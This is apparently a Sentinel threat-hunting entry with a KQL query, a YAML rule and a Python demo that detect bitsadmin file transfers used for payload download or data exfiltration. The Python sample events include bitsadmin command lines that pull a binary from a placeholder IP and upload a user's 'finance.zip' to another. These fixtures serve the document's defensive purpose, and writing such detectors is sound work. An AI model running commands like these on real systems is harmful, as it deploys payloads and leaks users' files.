Unusual BITSadmin activity may indicate an adversary leveraging the Background Intelligent Transfer Service to exfiltrate data or deploy malicious payloads. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential covert data transfer or persistence mechanisms.
KQL Query

```kql
DeviceProcessEvents
| where
    // match on image name or on the original file name to catch renamed copies of bitsadmin.exe
    (FileName =~ "bitsadmin.exe" or column_ifexists('ProcessVersionInfoOriginalFileName', 'ColumnNotAvailable') =~ 'bitsadmin.exe')
    and ProcessCommandLine has_any ('/Transfer', '/AddFile', '/AddFileSet', '/AddFileWithRanges')
| extend
    ParsedCommandLine = parse_command_line(ProcessCommandLine, 'windows')
| extend
    // for these verbs the remote URL and local path are the last two arguments
    RemoteUrl = tostring(ParsedCommandLine[-2]),
    LocalFile = tostring(ParsedCommandLine[-1]),
    Direction = iff(ProcessCommandLine has "/Upload", 'Upload', 'Download')
| project-reorder
    Timestamp,
    DeviceId,
    DeviceName,
    Direction,
    RemoteUrl,
    LocalFile,
    InitiatingProcessFolderPath,
    InitiatingProcessAccountDomain,
    InitiatingProcessAccountName,
    InitiatingProcessSHA256,
    ProcessCommandLine
```
```yaml
id: 2458e226-76e6-458c-8bf7-8766cc993b82
name: Bitsadmin Activity
description: |
  Background Intelligent Transfer Service (BITS) is a way to reliably download files from web servers or SMB servers.
  This service is commonly used for legitimate purposes, but can also be used as part of a malware downloader.
  Additionally, bitsadmin can be used to upload files and therefore can be used for data exfiltration. This
  query will identify use of bitsadmin.exe for either purpose and will identify the direction of the file transfer.
tactics:
  - Persistence
  - CommandAndControl
  - Exfiltration
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
query: |
  DeviceProcessEvents
  | where
      // match on image name or on the original file name to catch renamed copies of bitsadmin.exe
      (FileName =~ "bitsadmin.exe" or column_ifexists('ProcessVersionInfoOriginalFileName', 'ColumnNotAvailable') =~ 'bitsadmin.exe')
      and ProcessCommandLine has_any ('/Transfer', '/AddFile', '/AddFileSet', '/AddFileWithRanges')
  | extend
      ParsedCommandLine = parse_command_line(ProcessCommandLine, 'windows')
  | extend
      // for these verbs the remote URL and local path are the last two arguments
      RemoteUrl = tostring(ParsedCommandLine[-2]),
      LocalFile = tostring(ParsedCommandLine[-1]),
      Direction = iff(ProcessCommandLine has "/Upload", 'Upload', 'Download')
  | project-reorder
      Timestamp,
      DeviceId,
      DeviceName,
      Direction,
      RemoteUrl,
      LocalFile,
      InitiatingProcessFolderPath,
      InitiatingProcessAccountDomain,
      InitiatingProcessAccountName,
      InitiatingProcessSHA256,
      ProcessCommandLine
```
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Ensure the MicrosoftThreatProtection data connector that supplies this table is enabled |
| Scenario | Description | Filter/Exclusion |
|---|---|---|
| Scheduled System Updates via BITS | Windows Update may use BITS to download updates in the background. | Check for CommandLine containing wuauclt.exe or Update.exe, or filter by ProcessName matching wuauclt.exe. |
| Legitimate Software Installation Using BITS | Some enterprise software (e.g., Microsoft Office, Adobe products) may use BITS for silent installation. | Filter by ProcessName matching known installers (e.g., setup.exe, msiexec.exe) or check for CommandLine containing installation package names. |
| BITS Job for Backup or Sync Tasks | IT administrators may schedule BITS jobs for data synchronization or backup tasks. | Filter by JobName containing keywords like “backup”, “sync”, or “syncro”, or check for CommandLine containing bitsadmin.exe with known job names. |
| BITS Used for Software Distribution via Group Policy | IT may use BITS to distribute software via Group Policy Objects (GPOs). | Filter by ProcessName containing gpupdate.exe or GroupPolicy.exe, or check for CommandLine containing bitsadmin.exe with GPO-related job names. |
| BITS Used for Offline Content Download | Users may use bitsadmin.exe to download large files (e.g., ISOs, media files) for offline use. | Filter by CommandLine containing bitsadmin.exe with job names like “offline_download”, or check for User field matching known users with legitimate download needs. |
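To show how the query's extraction logic (last two arguments as remote URL and local file, `/Upload` deciding direction) behaves on real-looking command lines, and how the parent-process exclusions from the scenario table reduce noise, here is an added Python example that is not part of the hunting query or the Sentinel repository. The event rows, hosts and paths are constructed, and the allowlist of initiating processes is an assumption derived from the scenarios above.

```python
import re

# Constructed sample DeviceProcessEvents rows (not real telemetry); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"FileName": "bitsadmin.exe", "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": 'bitsadmin.exe /transfer job1 /download /priority normal http://198.51.100.7/p.bin "C:\\Users\\Public\\p.bin"'},
    {"FileName": "bitsadmin.exe", "InitiatingProcessFileName": "powershell.exe",
     "ProcessCommandLine": 'bitsadmin /transfer up /upload https://203.0.113.9/u "C:\\Users\\bob\\Documents\\finance.zip"'},
    {"FileName": "bitsadmin.exe", "InitiatingProcessFileName": "msiexec.exe",
     "ProcessCommandLine": "bitsadmin /addfile install https://updates.example.test/setup.msi C:\\Temp\\setup.msi"},
    {"FileName": "notepad.exe", "InitiatingProcessFileName": "explorer.exe",
     "ProcessCommandLine": "notepad.exe C:\\notes.txt"},
]

# Transfer verbs from the query's has_any() clause, matched as whole tokens the way KQL 'has' matches terms.
TRANSFER_VERBS = {"/transfer", "/addfile", "/addfileset", "/addfilewithranges"}
# Assumed allowlist of initiating processes, derived from the false-positive scenarios in the table.
EXPECTED_PARENTS = {"wuauclt.exe", "msiexec.exe", "setup.exe", "gpupdate.exe"}

def parse_windows_cmdline(cmdline):
    """Approximate parse_command_line(..., 'windows'): whitespace splits, double quotes group a token."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def classify(event):
    """Mirror the query's extend step: Direction, RemoteUrl and LocalFile for a bitsadmin transfer, else None."""
    if event["FileName"].lower() != "bitsadmin.exe":
        return None
    args = parse_windows_cmdline(event["ProcessCommandLine"])
    tokens = {a.lower() for a in args}
    if not (tokens & TRANSFER_VERBS) or len(args) < 2:
        return None
    return {
        "Direction": "Upload" if "/upload" in tokens else "Download",
        "RemoteUrl": args[-2],  # remote URL is the second-to-last argument
        "LocalFile": args[-1],  # local path is the last argument
        "ExpectedParent": event["InitiatingProcessFileName"].lower() in EXPECTED_PARENTS,
    }

def hunt(events):
    """Run the detection over rows and drop transfers launched by an allowlisted parent process."""
    findings = []
    for event in events:
        finding = classify(event)
        if finding and not finding["ExpectedParent"]:
            finding["ProcessCommandLine"] = event["ProcessCommandLine"]
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["Direction"], finding["RemoteUrl"], "->", finding["LocalFile"])
```

On the sample rows the msiexec.exe-launched /AddFile job is suppressed by the allowlist, while the cmd.exe download and the PowerShell-launched upload of a Documents file remain as findings.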